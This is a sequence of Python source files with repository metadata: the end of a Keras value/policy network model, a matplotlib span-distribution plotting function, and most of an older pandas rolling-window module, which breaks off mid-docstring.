[value_head, policy_head]) model.compile( loss={ "Policy_Head": "categorical_crossentropy", "Value_Head": "mse" }, loss_weights={ "Policy_Head": self.policy_loss_weight, "Value_Head": self.value_loss_weight }, optimizer=optimizers.Adam() ) return model def set_name(self, name: str) -> None: self.name = name def load(self, filename: int = -1) -> None: self._cache.clear() load_dir = os.path.join(self.base_dir, self.name) if filename == -1: filename = max(os.listdir(load_dir)) filepath = os.path.join(load_dir, str(filename)) self.model = load_model(filepath) logging.info(f"Loaded karas model from '{filepath}'") def load_checkpoint(self, filepath: str) -> None: self._cache.clear() self.model = load_model(filepath) logging.info(f"Loaded karas checkpoint data from '{filepath}'") def save(self, filename: str) -> None: filepath = os.path.join(self.base_dir, self.name, filename) self.model.save(filepath) logging.info(f"Saved karas model to '{filepath}'") def _get_conv_block(self, input_layer: layers.Layer, layer_id: int) -> layers.Layer: conv_layer = layers.Conv2D(filters=self.num_filters, kernel_size=(3, 3), padding="same", activation="relu", use_bias=True, data_format="channels_last", kernel_regularizer=self.conv_kernel_reg, bias_regularizer=self.conv_bias_reg, name=f"Convolutional_Layer_{layer_id}")(input_layer) batch_norm = layers.BatchNormalization( axis=-1, name=f"Batch_Normalization_{layer_id}")(conv_layer) return batch_norm def _get_policy_head(self, input_layer: layers.Layer) -> layers.Layer: conv_layer_1 = layers.Conv2D( filters=self.num_filters, kernel_size=(3, 3), padding="same", activation="relu", use_bias=True, data_format="channels_last", kernel_regularizer=self.conv_kernel_reg, bias_regularizer=self.conv_bias_reg, name="Policy_Convolutional_Layer_1")(input_layer) batch_norm_1 = layers.BatchNormalization( axis=-1, name="Policy_Batch_Normalization_1")(conv_layer_1) conv_layer_2 = layers.Conv2D( filters=1, kernel_size=(1, 1), padding="same", activation="relu", use_bias=True, data_format="channels_last", kernel_regularizer=self.conv_kernel_reg, bias_regularizer=self.conv_bias_reg, name="Policy_Convolutional_Layer_2")(batch_norm_1) batch_norm_2 = layers.BatchNormalization( axis=-1, name="Policy_Batch_Normalization_2")(conv_layer_2) flatten_layer = layers.Flatten(name="Policy_Flatten_Layer")(batch_norm_2) output_layer = layers.Dense( np.product(self.output_shape), activation='softmax', use_bias=True, kernel_regularizer=self.dense_kernel_reg, bias_regularizer=self.dense_kernel_reg, name='Policy_Head')(flatten_layer) return output_layer def _get_value_head(self, input_layer: layers.Layer) -> layers.Layer: conv_layer = layers.Conv2D( filters=1, kernel_size=(1, 1), padding="same", activation="relu", use_bias=True, data_format="channels_last", kernel_regularizer=self.conv_kernel_reg, bias_regularizer=self.conv_bias_reg, name="Value_Convolutional_Layer")(input_layer) batch_norm_1 = layers.BatchNormalization( axis=-1, name="Value_Batch_Normalization_1")(conv_layer) flatten_layer = layers.Flatten(name="Value_Flatten_Layer")(batch_norm_1) dense_layer = layers.Dense( 64, activation="relu", use_bias=True, kernel_regularizer=self.dense_kernel_reg, bias_regularizer=self.dense_bias_reg, name="Value_Dense_Layer")(flatten_layer) batch_norm_2 = layers.BatchNormalization( axis=-1, name="Value_Batch_Normalization_2")(dense_layer) output_layer = layers.Dense( 1, activation="tanh", use_bias=True, kernel_regularizer=self.dense_kernel_reg, bias_regularizer=self.dense_bias_reg, name="Value_Head")(batch_norm_2) return output_layer def predict(self, tensor: "BoardTensor", mask: np.array) -> Tuple[float, np.ndarray]: """ Given tensor and mask executes following algorithm. 1. Predict value (float) and policy (array 9x7x8) using NN provided with tensor. 2. Applies mask to remove invalid policies. 3. Normalizes masked array. :param tensor: Array representing current and previous board states. :param mask: Boolean array, 1's indicate valid moves and 0's invalid. :return: Tuple of predicted [value, normalised_probabilities]. """ if tensor.shape == self.input_shape: tensor = np.expand_dims(tensor, axis=0) value, policy = self._get_prediction(tensor) value = value[0][0] policy = policy.reshape(self.output_shape) policy *= mask policy = policy / np.sum(policy) return value, policy def _get_prediction(self, tensor) -> Tuple[float, np.ndarray]: """ Cached version of Keras.model.predict. :param tensor: Array representing current and previous board states. :return: Tuple of predicted [value, probabilities]. """ tensor_key = tensor.data.tobytes() if tensor_key not in self._cache: self._cache[tensor_key] = self.model.predict(tensor) if len(self._cache) > 2000: key = next(iter(self._cache)) del self._cache[key] return self._cache[tensor_key] value_policy_model = ValuePolicyModel() if __name__ == '__main__': # RUN TO GENERATE NEW MODEL TO TRAIN ON name = "first_model" kwargs = {"BASE_DIR": "../data/models"} model = ValuePolicyModel(**kwargs) model.set_name(name) model.save("0")
39.794393
99
0.65054
4f0e039c6ccc21f620b90d34e94415dfb0bf1f6e
808
py
Python
fpa/post_process_operation.py
salamann/fpadesigner
ebb92eef5998b8dd0562f5374ae39a80647926e5
[ "MIT" ]
null
null
null
fpa/post_process_operation.py
salamann/fpadesigner
ebb92eef5998b8dd0562f5374ae39a80647926e5
[ "MIT" ]
null
null
null
fpa/post_process_operation.py
salamann/fpadesigner
ebb92eef5998b8dd0562f5374ae39a80647926e5
[ "MIT" ]
null
null
null
#!/usr/bin/env python # -*- coding: utf-8 -*- import matplotlib.pyplot as plt import os def draw_spandirdata(yy, dL, clDist, circDist, ellipse, inducedAoa, planx, plany, dirname): plt.figure(figsize=(12, 10)) plt.axis("equal") plt.subplot(511) plt.plot(yy, dL, label="dL") plt.legend() plt.subplot(512) plt.plot(yy, clDist, label="dCL") plt.legend() plt.subplot(513) plt.plot(yy, circDist, label="Gamma") plt.plot(yy, ellipse, label="Ideal") plt.legend() plt.subplot(514) plt.plot(yy, inducedAoa, label="Alpha_i") plt.legend() plt.subplot(515) plt.plot(planx, plany, label="Planform") plt.legend() plt.xlabel("y [m]") plt.legend() plt.savefig(os.path.join("results", dirname, "span")) if __name__ == '__main__': pass
25.25
91
0.628713
3e0e0b74a971bfa6ee5efbbf5253247fb48bb8ce
70,929
py
Python
pandas/core/window.py
ikoevska/pandas
7169830040255c1073f99e2ee8817596a67b1cd5
[ "BSD-3-Clause" ]
1
2019-04-27T15:15:15.000Z
2019-04-27T15:15:15.000Z
pandas/core/window.py
ikoevska/pandas
7169830040255c1073f99e2ee8817596a67b1cd5
[ "BSD-3-Clause" ]
null
null
null
pandas/core/window.py
ikoevska/pandas
7169830040255c1073f99e2ee8817596a67b1cd5
[ "BSD-3-Clause" ]
null
null
null
""" provide a generic structure to support window functions, similar to how we have a Groupby object """ from __future__ import division import warnings import numpy as np from collections import defaultdict from datetime import timedelta from pandas.core.dtypes.generic import ( ABCSeries, ABCDataFrame, ABCDatetimeIndex, ABCTimedeltaIndex, ABCPeriodIndex, ABCDateOffset) from pandas.core.dtypes.common import ( is_integer, is_bool, is_float_dtype, is_integer_dtype, needs_i8_conversion, is_timedelta64_dtype, is_list_like, _ensure_float64, is_scalar) from pandas.core.base import (PandasObject, SelectionMixin, GroupByMixin) import pandas.core.common as com import pandas._libs.window as _window from pandas import compat from pandas.compat.numpy import function as nv from pandas.util._decorators import (Substitution, Appender, cache_readonly) from pandas.core.generic import _shared_docs from textwrap import dedent _shared_docs = dict(**_shared_docs) _doc_template = """ Returns ------- same type as input See also -------- pandas.Series.%(name)s pandas.DataFrame.%(name)s """ class _Window(PandasObject, SelectionMixin): _attributes = ['window', 'min_periods', 'center', 'win_type', 'axis', 'on', 'closed'] exclusions = set() def __init__(self, obj, window=None, min_periods=None, center=False, win_type=None, axis=0, on=None, closed=None, **kwargs): self.__dict__.update(kwargs) self.blocks = [] self.obj = obj self.on = on self.closed = closed self.window = window self.min_periods = min_periods self.center = center self.win_type = win_type self.win_freq = None self.axis = obj._get_axis_number(axis) if axis is not None else None self.validate() @property def _constructor(self): return Window @property def is_datetimelike(self): return None @property def _on(self): return None @property def is_freq_type(self): return self.win_type == 'freq' def validate(self): if self.center is not None and not is_bool(self.center): raise ValueError("center must be a boolean") if self.min_periods is not None and not \ is_integer(self.min_periods): raise ValueError("min_periods must be an integer") if self.closed is not None and self.closed not in \ ['right', 'both', 'left', 'neither']: raise ValueError("closed must be 'right', 'left', 'both' or " "'neither'") def _convert_freq(self): """ resample according to the how, return a new object """ obj = self._selected_obj index = None return obj, index def _create_blocks(self): """ split data into blocks & return conformed data """ obj, index = self._convert_freq() if index is not None: index = self._on # filter out the on from the object if self.on is not None: if obj.ndim == 2: obj = obj.reindex(columns=obj.columns.difference([self.on]), copy=False) blocks = obj._to_dict_of_blocks(copy=False).values() return blocks, obj, index def _gotitem(self, key, ndim, subset=None): """ sub-classes to define return a sliced object Parameters ---------- key : string / list of selections ndim : 1,2 requested ndim of result subset : object, default None subset to act on """ # create a new object to prevent aliasing if subset is None: subset = self.obj self = self._shallow_copy(subset) self._reset_cache() if subset.ndim == 2: if is_scalar(key) and key in subset or is_list_like(key): self._selection = key return self def __getattr__(self, attr): if attr in self._internal_names_set: return object.__getattribute__(self, attr) if attr in self.obj: return self[attr] raise AttributeError("%r object has no attribute %r" % (type(self).__name__, attr)) def _dir_additions(self): return self.obj._dir_additions() def _get_window(self, other=None): return self.window @property def _window_type(self): return self.__class__.__name__ def __unicode__(self): """ provide a nice str repr of our rolling object """ attrs = ["{k}={v}".format(k=k, v=getattr(self, k)) for k in self._attributes if getattr(self, k, None) is not None] return "{klass} [{attrs}]".format(klass=self._window_type, attrs=','.join(attrs)) def _get_index(self, index=None): """ Return index as ndarrays Returns ------- tuple of (index, index_as_ndarray) """ if self.is_freq_type: if index is None: index = self._on return index, index.asi8 return index, index def _prep_values(self, values=None, kill_inf=True): if values is None: values = getattr(self._selected_obj, 'values', self._selected_obj) # GH #12373 : rolling functions error on float32 data # make sure the data is coerced to float64 if is_float_dtype(values.dtype): values = _ensure_float64(values) elif is_integer_dtype(values.dtype): values = _ensure_float64(values) elif needs_i8_conversion(values.dtype): raise NotImplementedError("ops for {action} for this " "dtype {dtype} are not " "implemented".format( action=self._window_type, dtype=values.dtype)) else: try: values = _ensure_float64(values) except (ValueError, TypeError): raise TypeError("cannot handle this type -> {0}" "".format(values.dtype)) if kill_inf: values = values.copy() values[np.isinf(values)] = np.NaN return values def _wrap_result(self, result, block=None, obj=None): """ wrap a single result """ if obj is None: obj = self._selected_obj index = obj.index if isinstance(result, np.ndarray): # coerce if necessary if block is not None: if is_timedelta64_dtype(block.values.dtype): from pandas import to_timedelta result = to_timedelta( result.ravel(), unit='ns').values.reshape(result.shape) if result.ndim == 1: from pandas import Series return Series(result, index, name=obj.name) return type(obj)(result, index=index, columns=block.columns) return result def _wrap_results(self, results, blocks, obj): """ wrap the results Parameters ---------- results : list of ndarrays blocks : list of blocks obj : conformed data (may be resampled) """ from pandas import Series, concat from pandas.core.index import _ensure_index final = [] for result, block in zip(results, blocks): result = self._wrap_result(result, block=block, obj=obj) if result.ndim == 1: return result final.append(result) # if we have an 'on' column # we want to put it back into the results # in the same location columns = self._selected_obj.columns if self.on is not None and not self._on.equals(obj.index): name = self._on.name final.append(Series(self._on, index=obj.index, name=name)) if self._selection is not None: selection = _ensure_index(self._selection) # need to reorder to include original location of # the on column (if its not already there) if name not in selection: columns = self.obj.columns indexer = columns.get_indexer(selection.tolist() + [name]) columns = columns.take(sorted(indexer)) if not len(final): return obj.astype('float64') return concat(final, axis=1).reindex(columns=columns, copy=False) def _center_window(self, result, window): """ center the result in the window """ if self.axis > result.ndim - 1: raise ValueError("Requested axis is larger then no. of argument " "dimensions") offset = _offset(window, True) if offset > 0: if isinstance(result, (ABCSeries, ABCDataFrame)): result = result.slice_shift(-offset, axis=self.axis) else: lead_indexer = [slice(None)] * result.ndim lead_indexer[self.axis] = slice(offset, None) result = np.copy(result[tuple(lead_indexer)]) return result def aggregate(self, arg, *args, **kwargs): result, how = self._aggregate(arg, *args, **kwargs) if result is None: return self.apply(arg, args=args, kwargs=kwargs) return result agg = aggregate _shared_docs['sum'] = dedent(""" %(name)s sum""") _shared_docs['mean'] = dedent(""" %(name)s mean""") class Window(_Window): """ Provides rolling window calculations. .. versionadded:: 0.18.0 Parameters ---------- window : int, or offset Size of the moving window. This is the number of observations used for calculating the statistic. Each window will be a fixed size. If its an offset then this will be the time period of each window. Each window will be a variable sized based on the observations included in the time-period. This is only valid for datetimelike indexes. This is new in 0.19.0 min_periods : int, default None Minimum number of observations in window required to have a value (otherwise result is NA). For a window that is specified by an offset, this will default to 1. center : boolean, default False Set the labels at the center of the window. win_type : string, default None Provide a window type. If ``None``, all points are evenly weighted. See the notes below for further information. on : string, optional For a DataFrame, column on which to calculate the rolling window, rather than the index closed : string, default None Make the interval closed on the 'right', 'left', 'both' or 'neither' endpoints. For offset-based windows, it defaults to 'right'. For fixed windows, defaults to 'both'. Remaining cases not implemented for fixed windows. .. versionadded:: 0.20.0 axis : int or string, default 0 Returns ------- a Window or Rolling sub-classed for the particular operation Examples -------- >>> df = pd.DataFrame({'B': [0, 1, 2, np.nan, 4]}) >>> df B 0 0.0 1 1.0 2 2.0 3 NaN 4 4.0 Rolling sum with a window length of 2, using the 'triang' window type. >>> df.rolling(2, win_type='triang').sum() B 0 NaN 1 1.0 2 2.5 3 NaN 4 NaN Rolling sum with a window length of 2, min_periods defaults to the window length. >>> df.rolling(2).sum() B 0 NaN 1 1.0 2 3.0 3 NaN 4 NaN Same as above, but explicitly set the min_periods >>> df.rolling(2, min_periods=1).sum() B 0 0.0 1 1.0 2 3.0 3 2.0 4 4.0 A ragged (meaning not-a-regular frequency), time-indexed DataFrame >>> df = pd.DataFrame({'B': [0, 1, 2, np.nan, 4]}, ... index = [pd.Timestamp('20130101 09:00:00'), ... pd.Timestamp('20130101 09:00:02'), ... pd.Timestamp('20130101 09:00:03'), ... pd.Timestamp('20130101 09:00:05'), ... pd.Timestamp('20130101 09:00:06')]) >>> df B 2013-01-01 09:00:00 0.0 2013-01-01 09:00:02 1.0 2013-01-01 09:00:03 2.0 2013-01-01 09:00:05 NaN 2013-01-01 09:00:06 4.0 Contrasting to an integer rolling window, this will roll a variable length window corresponding to the time period. The default for min_periods is 1. >>> df.rolling('2s').sum() B 2013-01-01 09:00:00 0.0 2013-01-01 09:00:02 1.0 2013-01-01 09:00:03 3.0 2013-01-01 09:00:05 NaN 2013-01-01 09:00:06 4.0 Notes ----- By default, the result is set to the right edge of the window. This can be changed to the center of the window by setting ``center=True``. To learn more about the offsets & frequency strings, please see `this link <http://pandas.pydata.org/pandas-docs/stable/timeseries.html#offset-aliases>`__. The recognized win_types are: * ``boxcar`` * ``triang`` * ``blackman`` * ``hamming`` * ``bartlett`` * ``parzen`` * ``bohman`` * ``blackmanharris`` * ``nuttall`` * ``barthann`` * ``kaiser`` (needs beta) * ``gaussian`` (needs std) * ``general_gaussian`` (needs power, width) * ``slepian`` (needs width). If ``win_type=None`` all points are evenly weighted. To learn more about different window types see `scipy.signal window functions <https://docs.scipy.org/doc/scipy/reference/signal.html#window-functions>`__. See Also -------- expanding : Provides expanding transformations. ewm : Provides exponential weighted functions """ def validate(self): super(Window, self).validate() window = self.window if isinstance(window, (list, tuple, np.ndarray)): pass elif is_integer(window): if window < 0: raise ValueError("window must be non-negative") try: import scipy.signal as sig except ImportError: raise ImportError('Please install scipy to generate window ' 'weight') if not isinstance(self.win_type, compat.string_types): raise ValueError('Invalid win_type {0}'.format(self.win_type)) if getattr(sig, self.win_type, None) is None: raise ValueError('Invalid win_type {0}'.format(self.win_type)) else: raise ValueError('Invalid window {0}'.format(window)) def _prep_window(self, **kwargs): """ provide validation for our window type, return the window we have already been validated """ window = self._get_window() if isinstance(window, (list, tuple, np.ndarray)): return com._asarray_tuplesafe(window).astype(float) elif is_integer(window): import scipy.signal as sig # the below may pop from kwargs def _validate_win_type(win_type, kwargs): arg_map = {'kaiser': ['beta'], 'gaussian': ['std'], 'general_gaussian': ['power', 'width'], 'slepian': ['width']} if win_type in arg_map: return tuple([win_type] + _pop_args(win_type, arg_map[win_type], kwargs)) return win_type def _pop_args(win_type, arg_names, kwargs): msg = '%s window requires %%s' % win_type all_args = [] for n in arg_names: if n not in kwargs: raise ValueError(msg % n) all_args.append(kwargs.pop(n)) return all_args win_type = _validate_win_type(self.win_type, kwargs) # GH #15662. `False` makes symmetric window, rather than periodic. return sig.get_window(win_type, window, False).astype(float) def _apply_window(self, mean=True, **kwargs): """ Applies a moving window of type ``window_type`` on the data. Parameters ---------- mean : boolean, default True If True computes weighted mean, else weighted sum Returns ------- y : type of input argument """ window = self._prep_window(**kwargs) center = self.center blocks, obj, index = self._create_blocks() results = [] for b in blocks: try: values = self._prep_values(b.values) except TypeError: results.append(b.values.copy()) continue if values.size == 0: results.append(values.copy()) continue offset = _offset(window, center) additional_nans = np.array([np.NaN] * offset) def f(arg, *args, **kwargs): minp = _use_window(self.min_periods, len(window)) return _window.roll_window(np.concatenate((arg, additional_nans)) if center else arg, window, minp, avg=mean) result = np.apply_along_axis(f, self.axis, values) if center: result = self._center_window(result, window) results.append(result) return self._wrap_results(results, blocks, obj) _agg_doc = dedent(""" Examples -------- >>> df = pd.DataFrame(np.random.randn(10, 3), columns=['A', 'B', 'C']) >>> df A B C 0 -2.385977 -0.102758 0.438822 1 -1.004295 0.905829 -0.954544 2 0.735167 -0.165272 -1.619346 3 -0.702657 -1.340923 -0.706334 4 -0.246845 0.211596 -0.901819 5 2.463718 3.157577 -1.380906 6 -1.142255 2.340594 -0.039875 7 1.396598 -1.647453 1.677227 8 -0.543425 1.761277 -0.220481 9 -0.640505 0.289374 -1.550670 >>> df.rolling(3, win_type='boxcar').agg('mean') A B C 0 NaN NaN NaN 1 NaN NaN NaN 2 -0.885035 0.212600 -0.711689 3 -0.323928 -0.200122 -1.093408 4 -0.071445 -0.431533 -1.075833 5 0.504739 0.676083 -0.996353 6 0.358206 1.903256 -0.774200 7 0.906020 1.283573 0.085482 8 -0.096361 0.818139 0.472290 9 0.070889 0.134399 -0.031308 See also -------- pandas.DataFrame.rolling.aggregate pandas.DataFrame.aggregate """) @Appender(_agg_doc) @Appender(_shared_docs['aggregate'] % dict( versionadded='', klass='Series/DataFrame')) def aggregate(self, arg, *args, **kwargs): result, how = self._aggregate(arg, *args, **kwargs) if result is None: # these must apply directly result = arg(self) return result agg = aggregate @Substitution(name='window') @Appender(_doc_template) @Appender(_shared_docs['sum']) def sum(self, *args, **kwargs): nv.validate_window_func('sum', args, kwargs) return self._apply_window(mean=False, **kwargs) @Substitution(name='window') @Appender(_doc_template) @Appender(_shared_docs['mean']) def mean(self, *args, **kwargs): nv.validate_window_func('mean', args, kwargs) return self._apply_window(mean=True, **kwargs) class _GroupByMixin(GroupByMixin): """ provide the groupby facilities """ def __init__(self, obj, *args, **kwargs): parent = kwargs.pop('parent', None) # noqa groupby = kwargs.pop('groupby', None) if groupby is None: groupby, obj = obj, obj.obj self._groupby = groupby self._groupby.mutated = True self._groupby.grouper.mutated = True super(GroupByMixin, self).__init__(obj, *args, **kwargs) count = GroupByMixin._dispatch('count') corr = GroupByMixin._dispatch('corr', other=None, pairwise=None) cov = GroupByMixin._dispatch('cov', other=None, pairwise=None) def _apply(self, func, name, window=None, center=None, check_minp=None, **kwargs): """ dispatch to apply; we are stripping all of the _apply kwargs and performing the original function call on the grouped object """ def f(x, name=name, *args): x = self._shallow_copy(x) if isinstance(name, compat.string_types): return getattr(x, name)(*args, **kwargs) return x.apply(name, *args, **kwargs) return self._groupby.apply(f) class _Rolling(_Window): @property def _constructor(self): return Rolling def _apply(self, func, name=None, window=None, center=None, check_minp=None, **kwargs): """ Rolling statistical measure using supplied function. Designed to be used with passed-in Cython array-based functions. Parameters ---------- func : string/callable to apply name : string, optional name of this function window : int/array, default to _get_window() center : boolean, default to self.center check_minp : function, default to _use_window Returns ------- y : type of input """ if center is None: center = self.center if window is None: window = self._get_window() if check_minp is None: check_minp = _use_window blocks, obj, index = self._create_blocks() index, indexi = self._get_index(index=index) results = [] for b in blocks: try: values = self._prep_values(b.values) except TypeError: results.append(b.values.copy()) continue if values.size == 0: results.append(values.copy()) continue # if we have a string function name, wrap it if isinstance(func, compat.string_types): cfunc = getattr(_window, func, None) if cfunc is None: raise ValueError("we do not support this function " "in _window.{0}".format(func)) def func(arg, window, min_periods=None, closed=None): minp = check_minp(min_periods, window) # ensure we are only rolling on floats arg = _ensure_float64(arg) return cfunc(arg, window, minp, indexi, closed, **kwargs) # calculation function if center: offset = _offset(window, center) additional_nans = np.array([np.NaN] * offset) def calc(x): return func(np.concatenate((x, additional_nans)), window, min_periods=self.min_periods, closed=self.closed) else: def calc(x): return func(x, window, min_periods=self.min_periods, closed=self.closed) with np.errstate(all='ignore'): if values.ndim > 1: result = np.apply_along_axis(calc, self.axis, values) else: result = calc(values) if center: result = self._center_window(result, window) results.append(result) return self._wrap_results(results, blocks, obj) class _Rolling_and_Expanding(_Rolling): _shared_docs['count'] = """%(name)s count of number of non-NaN observations inside provided window.""" def count(self): blocks, obj, index = self._create_blocks() index, indexi = self._get_index(index=index) window = self._get_window() window = min(window, len(obj)) if not self.center else window results = [] for b in blocks: result = b.notna().astype(int) result = self._constructor(result, window=window, min_periods=0, center=self.center, closed=self.closed).sum() results.append(result) return self._wrap_results(results, blocks, obj) _shared_docs['apply'] = dedent(r""" %(name)s function apply Parameters ---------- func : function Must produce a single value from an ndarray input \*args and \*\*kwargs are passed to the function""") def apply(self, func, args=(), kwargs={}): # TODO: _level is unused? _level = kwargs.pop('_level', None) # noqa window = self._get_window() offset = _offset(window, self.center) index, indexi = self._get_index() def f(arg, window, min_periods, closed): minp = _use_window(min_periods, window) return _window.roll_generic(arg, window, minp, indexi, closed, offset, func, args, kwargs) return self._apply(f, func, args=args, kwargs=kwargs, center=False) def sum(self, *args, **kwargs): nv.validate_window_func('sum', args, kwargs) return self._apply('roll_sum', 'sum', **kwargs) _shared_docs['max'] = dedent(""" %(name)s maximum """) def max(self, *args, **kwargs): nv.validate_window_func('max', args, kwargs) return self._apply('roll_max', 'max', **kwargs) _shared_docs['min'] = dedent(""" %(name)s minimum """) def min(self, *args, **kwargs): nv.validate_window_func('min', args, kwargs) return self._apply('roll_min', 'min', **kwargs) def mean(self, *args, **kwargs): nv.validate_window_func('mean', args, kwargs) return self._apply('roll_mean', 'mean', **kwargs) _shared_docs['median'] = dedent(""" %(name)s median """) def median(self, **kwargs): return self._apply('roll_median_c', 'median', **kwargs) _shared_docs['std'] = dedent(""" Calculate %(name)s standard deviation. Normalized by N-1 by default. This can be changed using the `ddof` argument. Parameters ---------- ddof : int, default 1 Delta Degrees of Freedom. The divisor used in calculations is ``N - ddof``, where ``N`` represents the number of elements. *args, **kwargs For NumPy compatibility. No additional arguments are used. Returns ------- Series or DataFrame Returns the same object type as the caller of the %(name)s calculation. See Also -------- Series.%(name)s : Calling object with Series data DataFrame.%(name)s : Calling object with DataFrames Series.std : Equivalent method for Series DataFrame.std : Equivalent method for DataFrame numpy.std : Equivalent method for Numpy array Notes ----- The default `ddof` of 1 used in Series.std is different than the default `ddof` of 0 in numpy.std. A minimum of one period is required for the rolling calculation. Examples -------- >>> s = pd.Series([5, 5, 6, 7, 5, 5, 5]) >>> s.rolling(3).std() 0 NaN 1 NaN 2 0.577350 3 1.000000 4 1.000000 5 1.154701 6 0.000000 dtype: float64 >>> s.expanding(3).std() 0 NaN 1 NaN 2 0.577350 3 0.957427 4 0.894427 5 0.836660 6 0.786796 dtype: float64 """) def std(self, ddof=1, *args, **kwargs): nv.validate_window_func('std', args, kwargs) window = self._get_window() index, indexi = self._get_index() def f(arg, *args, **kwargs): minp = _require_min_periods(1)(self.min_periods, window) return _zsqrt(_window.roll_var(arg, window, minp, indexi, self.closed, ddof)) return self._apply(f, 'std', check_minp=_require_min_periods(1), ddof=ddof, **kwargs) _shared_docs['var'] = dedent(""" Calculate unbiased %(name)s variance. Normalized by N-1 by default. This can be changed using the `ddof` argument. Parameters ---------- ddof : int, default 1 Delta Degrees of Freedom. The divisor used in calculations is ``N - ddof``, where ``N`` represents the number of elements. *args, **kwargs For NumPy compatibility. No additional arguments are used. Returns ------- Series or DataFrame Returns the same object type as the caller of the %(name)s calculation. See Also -------- Series.%(name)s : Calling object with Series data DataFrame.%(name)s : Calling object with DataFrames Series.var : Equivalent method for Series DataFrame.var : Equivalent method for DataFrame numpy.var : Equivalent method for Numpy array Notes ----- The default `ddof` of 1 used in :meth:`Series.var` is different than the default `ddof` of 0 in :func:`numpy.var`. A minimum of 1 period is required for the rolling calculation. Examples -------- >>> s = pd.Series([5, 5, 6, 7, 5, 5, 5]) >>> s.rolling(3).var() 0 NaN 1 NaN 2 0.333333 3 1.000000 4 1.000000 5 1.333333 6 0.000000 dtype: float64 >>> s.expanding(3).var() 0 NaN 1 NaN 2 0.333333 3 0.916667 4 0.800000 5 0.700000 6 0.619048 dtype: float64 """) def var(self, ddof=1, *args, **kwargs): nv.validate_window_func('var', args, kwargs) return self._apply('roll_var', 'var', check_minp=_require_min_periods(1), ddof=ddof, **kwargs) _shared_docs['skew'] = """Unbiased %(name)s skewness""" def skew(self, **kwargs): return self._apply('roll_skew', 'skew', check_minp=_require_min_periods(3), **kwargs) _shared_docs['kurt'] = dedent(""" Calculate unbiased %(name)s kurtosis. This function uses Fisher's definition of kurtosis without bias. Parameters ---------- **kwargs Under Review. Returns ------- Series or DataFrame Returned object type is determined by the caller of the %(name)s calculation See Also -------- Series.%(name)s : Calling object with Series data DataFrame.%(name)s : Calling object with DataFrames Series.kurt : Equivalent method for Series DataFrame.kurt : Equivalent method for DataFrame scipy.stats.skew : Third moment of a probability density scipy.stats.kurtosis : Reference SciPy method Notes ----- A minimum of 4 periods is required for the %(name)s calculation. """) def kurt(self, **kwargs): return self._apply('roll_kurt', 'kurt', check_minp=_require_min_periods(4), **kwargs) _shared_docs['quantile'] = dedent(""" %(name)s quantile Parameters ---------- quantile : float 0 <= quantile <= 1""") def quantile(self, quantile, **kwargs): window = self._get_window() index, indexi = self._get_index() def f(arg, *args, **kwargs): minp = _use_window(self.min_periods, window) if quantile == 1.0: return _window.roll_max(arg, window, minp, indexi, self.closed) elif quantile == 0.0: return _window.roll_min(arg, window, minp, indexi, self.closed) else: return _window.roll_quantile(arg, window, minp, indexi, self.closed, quantile) return self._apply(f, 'quantile', quantile=quantile, **kwargs) _shared_docs['cov'] = dedent(""" %(name)s sample covariance Parameters ---------- other : Series, DataFrame, or ndarray, optional if not supplied then will default to self and produce pairwise output pairwise : bool, default None If False then only matching columns between self and other will be used and the output will be a DataFrame. If True then all pairwise combinations will be calculated and the output will be a MultiIndexed DataFrame in the case of DataFrame inputs. In the case of missing elements, only complete pairwise observations will be used. ddof : int, default 1 Delta Degrees of Freedom. The divisor used in calculations is ``N - ddof``, where ``N`` represents the number of elements.""") def cov(self, other=None, pairwise=None, ddof=1, **kwargs): if other is None: other = self._selected_obj # only default unset pairwise = True if pairwise is None else pairwise other = self._shallow_copy(other) # GH 16058: offset window if self.is_freq_type: window = self.win_freq else: window = self._get_window(other) def _get_cov(X, Y): # GH #12373 : rolling functions error on float32 data # to avoid potential overflow, cast the data to float64 X = X.astype('float64') Y = Y.astype('float64') mean = lambda x: x.rolling(window, self.min_periods, center=self.center).mean(**kwargs) count = (X + Y).rolling(window=window, center=self.center).count(**kwargs) bias_adj = count / (count - ddof) return (mean(X * Y) - mean(X) * mean(Y)) * bias_adj return _flex_binary_moment(self._selected_obj, other._selected_obj, _get_cov, pairwise=bool(pairwise)) _shared_docs['corr'] = dedent(""" %(name)s sample correlation Parameters ---------- other : Series, DataFrame, or ndarray, optional if not supplied then will default to self and produce pairwise output pairwise : bool, default None If False then only matching columns between self and other will be used and the output will be a DataFrame. If True then all pairwise combinations will be calculated and the output will be a MultiIndex DataFrame in the case of DataFrame inputs. In the case of missing elements, only complete pairwise observations will be used.""") def corr(self, other=None, pairwise=None, **kwargs): if other is None: other = self._selected_obj # only default unset pairwise = True if pairwise is None else pairwise other = self._shallow_copy(other) window = self._get_window(other) def _get_corr(a, b): a = a.rolling(window=window, min_periods=self.min_periods, center=self.center) b = b.rolling(window=window, min_periods=self.min_periods, center=self.center) return a.cov(b, **kwargs) / (a.std(**kwargs) * b.std(**kwargs)) return _flex_binary_moment(self._selected_obj, other._selected_obj, _get_corr, pairwise=bool(pairwise)) class Rolling(_Rolling_and_Expanding): @cache_readonly def is_datetimelike(self): return isinstance(self._on, (ABCDatetimeIndex, ABCTimedeltaIndex, ABCPeriodIndex)) @cache_readonly def _on(self): if self.on is None: return self.obj.index elif (isinstance(self.obj, ABCDataFrame) and self.on in self.obj.columns): from pandas import Index return Index(self.obj[self.on]) else: raise ValueError("invalid on specified as {0}, " "must be a column (if DataFrame) " "or None".format(self.on)) def validate(self): super(Rolling, self).validate() # we allow rolling on a datetimelike index if ((self.obj.empty or self.is_datetimelike) and isinstance(self.window, (compat.string_types, ABCDateOffset, timedelta))): self._validate_monotonic() freq = self._validate_freq() # we don't allow center if self.center: raise NotImplementedError("center is not implemented " "for datetimelike and offset " "based windows") # this will raise ValueError on non-fixed freqs self.win_freq = self.window self.window = freq.nanos self.win_type = 'freq' # min_periods must be an integer if self.min_periods is None: self.min_periods = 1 elif not is_integer(self.window): raise ValueError("window must be an integer") elif self.window < 0: raise ValueError("window must be non-negative") if not self.is_datetimelike and self.closed is not None: raise ValueError("closed only implemented for datetimelike " "and offset based windows") def _validate_monotonic(self): """ validate on is monotonic """ if not self._on.is_monotonic: formatted = self.on or 'index' raise ValueError("{0} must be " "monotonic".format(formatted)) def _validate_freq(self): """ validate & return window frequency """ from pandas.tseries.frequencies import to_offset try: return to_offset(self.window) except (TypeError, ValueError): raise ValueError("passed window {0} is not " "compatible with a datetimelike " "index".format(self.window)) _agg_doc = dedent(""" Examples -------- >>> df = pd.DataFrame(np.random.randn(10, 3), columns=['A', 'B', 'C']) >>> df A B C 0 -2.385977 -0.102758 0.438822 1 -1.004295 0.905829 -0.954544 2 0.735167 -0.165272 -1.619346 3 -0.702657 -1.340923 -0.706334 4 